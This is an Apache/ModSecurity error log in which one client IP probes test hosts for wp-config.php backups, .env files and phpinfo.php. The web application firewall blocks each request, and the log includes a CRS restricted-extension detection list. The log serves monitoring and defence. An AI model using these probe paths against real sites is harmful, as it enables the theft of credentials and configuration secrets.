[Tue Jan 21 15:20:51.262592 2025] [:error] [pid 621494] [client 193.41.206.36:44820] [client 193.41.206.36] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "Z4-tQ5DgwuhXEyFlM9PzJgAAAAA"]
[Tue Jan 21 15:20:51.262722 2025] [:error] [pid 621494] [client 193.41.206.36:44820] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "Z4-tQ5DgwuhXEyFlM9PzJgAAAAA"]
[Tue Jan 21 15:20:51.262905 2025] [:error] [pid 621494] [client 193.41.206.36:44820] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "Z4-tQ5DgwuhXEyFlM9PzJgAAAAA"]
[Tue Jan 21 15:20:51.263088 2025] [:error] [pid 621494] [client 193.41.206.36:44820] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "Z4-tQ5DgwuhXEyFlM9PzJgAAAAA"]
[Tue Jan 21 15:20:53.853717 2025] [:error] [pid 621494] [client 193.41.206.36:44820] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z4-tRZDgwuhXEyFlM9PzJwAAAAA"]
[Tue Jan 21 15:20:53.854217 2025] [:error] [pid 621494] [client 193.41.206.36:44820] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z4-tRZDgwuhXEyFlM9PzJwAAAAA"]
[Tue Jan 21 15:20:53.854843 2025] [:error] [pid 621494] [client 193.41.206.36:44820] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z4-tRZDgwuhXEyFlM9PzJwAAAAA"]
[Tue Jan 21 15:20:53.879275 2025] [:error] [pid 621526] [client 193.41.206.36:44804] [client 193.41.206.36] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "Z4-tRfl9UUKBWX7xOcp1PgAAAAU"]
[Tue Jan 21 15:20:53.879679 2025] [:error] [pid 621526] [client 193.41.206.36:44804] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "Z4-tRfl9UUKBWX7xOcp1PgAAAAU"]
[Tue Jan 21 15:20:53.880052 2025] [:error] [pid 621526] [client 193.41.206.36:44804] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "Z4-tRfl9UUKBWX7xOcp1PgAAAAU"]
[Tue Jan 21 15:20:53.880505 2025] [:error] [pid 621526] [client 193.41.206.36:44804] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "Z4-tRfl9UUKBWX7xOcp1PgAAAAU"]
[Tue Jan 21 15:20:56.758522 2025] [:error] [pid 621494] [client 193.41.206.36:44820] [client 193.41.206.36] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.wp-config.php.swp"] [unique_id "Z4-tSJDgwuhXEyFlM9PzKAAAAAA"]
[Tue Jan 21 15:20:56.759099 2025] [:error] [pid 621494] [client 193.41.206.36:44820] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.wp-config.php.swp"] [unique_id "Z4-tSJDgwuhXEyFlM9PzKAAAAAA"]
[Tue Jan 21 15:20:56.759631 2025] [:error] [pid 621494] [client 193.41.206.36:44820] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.wp-config.php.swp"] [unique_id "Z4-tSJDgwuhXEyFlM9PzKAAAAAA"]
[Tue Jan 21 15:20:59.453468 2025] [:error] [pid 621494] [client 193.41.206.36:44820] [client 193.41.206.36] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "Z4-tS5DgwuhXEyFlM9PzKQAAAAA"]
[Tue Jan 21 15:20:59.454790 2025] [:error] [pid 621494] [client 193.41.206.36:44820] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "Z4-tS5DgwuhXEyFlM9PzKQAAAAA"]
[Tue Jan 21 15:20:59.455053 2025] [:error] [pid 621494] [client 193.41.206.36:44820] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "Z4-tS5DgwuhXEyFlM9PzKQAAAAA"]
[Tue Jan 21 15:20:59.455416 2025] [:error] [pid 621494] [client 193.41.206.36:44820] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "Z4-tS5DgwuhXEyFlM9PzKQAAAAA"]
[Tue Jan 21 15:21:30.567651 2025] [authz_core:error] [pid 621583] [client 193.41.206.36:54904] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/phpinfo.php
[Tue Jan 21 15:21:35.894482 2025] [authz_core:error] [pid 621519] [client 193.41.206.36:33314] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/phpinfo.php
[Tue Jan 21 15:22:59.679072 2025] [:error] [pid 621517] [client 193.41.206.36:42594] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.php"] [unique_id "Z4-tw6UWvTqJytu-P8cD-wAAAA0"]
[Tue Jan 21 15:22:59.679483 2025] [:error] [pid 621517] [client 193.41.206.36:42594] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.php"] [unique_id "Z4-tw6UWvTqJytu-P8cD-wAAAA0"]
[Tue Jan 21 15:22:59.679914 2025] [:error] [pid 621517] [client 193.41.206.36:42594] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.php"] [unique_id "Z4-tw6UWvTqJytu-P8cD-wAAAA0"]
[Tue Jan 21 15:23:03.939392 2025] [:error] [pid 621571] [client 193.41.206.36:41026] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.php"] [unique_id "Z4-tx3zZkUI2sFKnmMyLYAAAAAE"]
[Tue Jan 21 15:23:03.939820 2025] [:error] [pid 621571] [client 193.41.206.36:41026] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.php"] [unique_id "Z4-tx3zZkUI2sFKnmMyLYAAAAAE"]
[Tue Jan 21 15:23:03.940262 2025] [:error] [pid 621571] [client 193.41.206.36:41026] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.php"] [unique_id "Z4-tx3zZkUI2sFKnmMyLYAAAAAE"]
[Tue Jan 21 15:23:39.868321 2025] [:error] [pid 610121] [client 193.41.206.36:36218] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "Z4-t63So5nIGeA4GeT4brAAAAAc"]
[Tue Jan 21 15:23:39.869259 2025] [:error] [pid 610121] [client 193.41.206.36:36218] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "Z4-t63So5nIGeA4GeT4brAAAAAc"]
[Tue Jan 21 15:23:39.869904 2025] [:error] [pid 610121] [client 193.41.206.36:36218] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "Z4-t63So5nIGeA4GeT4brAAAAAc"]
[Tue Jan 21 15:23:39.890211 2025] [:error] [pid 621596] [client 193.41.206.36:36224] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "Z4-t64_uLxeHB5E1yj43oAAAAAQ"]
[Tue Jan 21 15:23:39.890681 2025] [:error] [pid 621596] [client 193.41.206.36:36224] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "Z4-t64_uLxeHB5E1yj43oAAAAAQ"]
[Tue Jan 21 15:23:39.891021 2025] [:error] [pid 621596] [client 193.41.206.36:36224] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "Z4-t64_uLxeHB5E1yj43oAAAAAQ"]
[Tue Jan 21 15:23:43.083494 2025] [:error] [pid 621596] [client 193.41.206.36:36224] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /content/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/content/.env"] [unique_id "Z4-t74_uLxeHB5E1yj43oQAAAAQ"]
[Tue Jan 21 15:23:43.084907 2025] [:error] [pid 621596] [client 193.41.206.36:36224] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/content/.env"] [unique_id "Z4-t74_uLxeHB5E1yj43oQAAAAQ"]
[Tue Jan 21 15:23:43.085400 2025] [:error] [pid 621596] [client 193.41.206.36:36224] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/content/.env"] [unique_id "Z4-t74_uLxeHB5E1yj43oQAAAAQ"]
[Tue Jan 21 15:23:43.172589 2025] [:error] [pid 610121] [client 193.41.206.36:36218] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /content/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/content/.env"] [unique_id "Z4-t73So5nIGeA4GeT4brQAAAAc"]
[Tue Jan 21 15:23:43.173006 2025] [:error] [pid 610121] [client 193.41.206.36:36218] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/content/.env"] [unique_id "Z4-t73So5nIGeA4GeT4brQAAAAc"]
[Tue Jan 21 15:23:43.173455 2025] [:error] [pid 610121] [client 193.41.206.36:36218] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/content/.env"] [unique_id "Z4-t73So5nIGeA4GeT4brQAAAAc"]
